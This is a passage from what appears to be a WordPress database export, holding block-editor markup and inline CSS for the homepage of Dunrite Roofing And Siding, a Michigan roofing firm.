{\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a3a7f8e1-d3ba-413d-9b6f-e963bd071379 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\">View All</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/skt-blocks-post-grid {\"postsToShow\":2,\"displayPostExcerpt\":false,\"displayPostAuthor\":false,\"postTitleTag\":\"h5\",\"readMoreText\":\"Read More\",\"bgColor\":\"#ffffff\",\"imageBorderRadius\":0,\"metaColor\":\"#6a6a6a\",\"readMoreLinkColor\":\"#fc8134\",\"titleColor\":\"#282828\",\"titleHoverColor\":\"#0d2e63\",\"contentPadding\":0,\"continueFontSize\":16,\"continueFontWeight\":\"600\",\"titleFontSize\":24,\"titleLineHeight\":1.2,\"titleFontWeight\":\"400\",\"metaFontSize\":16,\"metaFontWeight\":\"400\",\"metaTextTransform\":\"capitalize\",\"titleFontFamily\":\"Poppins\",\"metaFontFamily\":\"Poppins\",\"rowGap\":0,\"postGridBlockId\":\"89bc1d0c\"} /--></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','inherit','closed','closed','','336-revision-v1','','','2022-08-22 20:18:15','2022-08-22 20:18:15','',336,'https://cteisys.com/?p=389',0,'revision','',0),(390,1,'2022-08-22 20:18:41','2022-08-22 20:18:41','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"f038c729-2cb3-48e6-a5f7-7ce0526e1314\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f038c729-2cb3-48e6-a5f7-7ce0526e1314.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"a202d1b2-2693-46ac-9aac-5131073b5669\"} -->\n<style type=\"text/css\"> .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a202d1b2-2693-46ac-9aac-5131073b5669 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-a202d1b2-2693-46ac-9aac-5131073b5669 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"e922e93a-8271-4655-97bb-328ea23766a6\"} -->\n<style type=\"text/css\"> .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e922e93a-8271-4655-97bb-328ea23766a6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e922e93a-8271-4655-97bb-328ea23766a6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":386,\"width\":257,\"height\":530,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-full is-resized is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\" alt=\"\" class=\"wp-image-386\" width=\"257\" height=\"530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"a95a693b-83a8-40bc-b96a-96cca414adaf\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-a95a693b-83a8-40bc-b96a-96cca414adaf background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a95a693b-83a8-40bc-b96a-96cca414adaf.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"2e718769-fcd4-4785-9412-0cd3058119e1\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-2e718769-fcd4-4785-9412-0cd3058119e1 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-2e718769-fcd4-4785-9412-0cd3058119e1\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"6549beaf-ccab-45d8-a2d8-1762500e8593\"} -->\n<style type=\"text/css\"> .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6549beaf-ccab-45d8-a2d8-1762500e8593 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-6549beaf-ccab-45d8-a2d8-1762500e8593\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"46b2c521-30e6-4f12-bba8-c52b80616d9c\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-46b2c521-30e6-4f12-bba8-c52b80616d9c {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-46b2c521-30e6-4f12-bba8-c52b80616d9c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Dunrite Roofing And Siding</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing have led us to become a top choice when it comes to roofing and siding in southeastern Michigan. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"baab3fad-1feb-480f-b0a0-542d07c7eba5\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-baab3fad-1feb-480f-b0a0-542d07c7eba5 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5 .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-baab3fad-1feb-480f-b0a0-542d07c7eba5.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"e4337017-bf4d-4e71-bbfe-842d1c251e6c\"} -->\n<style type=\"text/css\"> .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e4337017-bf4d-4e71-bbfe-842d1c251e6c .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-e4337017-bf4d-4e71-bbfe-842d1c251e6c skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"7840f5f3-0744-458f-9ff2-16549137981d\"} -->\n<style type=\"text/css\"> .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n 